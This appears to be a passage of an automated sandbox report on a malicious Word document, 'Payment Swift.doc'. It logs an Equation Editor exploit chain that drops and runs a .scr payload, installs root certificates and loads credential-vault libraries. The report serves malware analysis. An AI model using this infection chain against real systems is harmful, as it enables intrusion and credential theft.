              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@7/9@2/2
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$yment Swift.docJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrMutant created: NULL
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR63A2.tmpJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Payment Swift.docReversingLabs: Detection: 43%
              Source: Payment Swift.docVirustotal: Detection: 45%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\microme09255.scr "C:\Users\user\AppData\Roaming\microme09255.scr"
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess created: C:\Users\user\AppData\Roaming\microme09255.scr "C:\Users\user\AppData\Roaming\microme09255.scr"
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\microme09255.scr "C:\Users\user\AppData\Roaming\microme09255.scr"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess created: C:\Users\user\AppData\Roaming\microme09255.scr "C:\Users\user\AppData\Roaming\microme09255.scr"Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: bcrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: bcrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: wbemcomn2.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: ntdsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: credssp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
              Source: Payment Swift.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Payment Swift.doc
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\AppData\Roaming\microme09255.scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: microme09255.scr, 00000005.00000002.348544360.00000000022C1000.00000004.00000800.00020000.00000000.sdmp, microme09255.scr, 00000005.00000002.348261996.0000000000230000.00000004.08000000.00040000.00000000.sdmp
              Source: microm[1].scr.2.drStatic PE information: 0xF0D93282 [Fri Jan 17 03:01:22 2098 UTC]
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00607A67 push esp; ret 2_2_00607A6B
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00607A6F push esp; ret 2_2_00607A73
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00607A77 push esp; ret 2_2_00607A7B
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0060FA7E push esi; ret 2_2_0060FA7F
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00605452 push esi; ret 2_2_00605453
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0061002A push esp; ret 2_2_0061002B
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00610032 push esp; ret 2_2_00610033
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0060A8F2 push ebp; ret 2_2_0060A8F3
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0060A8FA push ebp; ret 2_2_0060A8FB
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0060F8AA push esi; ret 2_2_0060F8AB
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0060F8B2 push esi; ret 2_2_0060F8B3
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006052BE push esi; ret 2_2_006052BF
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0060FA86 push esi; ret 2_2_0060FA87
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00608366 push esp; ret 2_2_00608367
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0060836E push esp; ret 2_2_0060836F
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00608979 push esi; ret 2_2_0060897B
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00606D25 push esi; ret 2_2_00606D27
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00606D1D push esi; ret 2_2_00606D1F
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00605FE2 push esi; ret 2_2_00605FE3
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00605FEA push esi; ret 2_2_00605FEB
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0060C3AA push esp; ret 2_2_0060C3AB
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00608981 push esi; ret 2_2_00608983
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0060658E push esp; ret 2_2_0060658F
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00606596 push esp; ret 2_2_00606597
              Source: C:\Users\user\AppData\Roaming\microme09255.scrCode function: 5_2_001C07C8 pushad ; retn 0017h5_2_001C07E1
              Source: microm[1].scr.2.drStatic PE information: section name: .text entropy: 7.181612006870042
              Source: microme09255.scr.2.drStatic PE information: section name: .text entropy: 7.181612006870042

              Persistence and Installation Behavior

              barindex
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\microme09255.scrJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microm[1].scrJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\microme09255.scrJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microm[1].scrJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
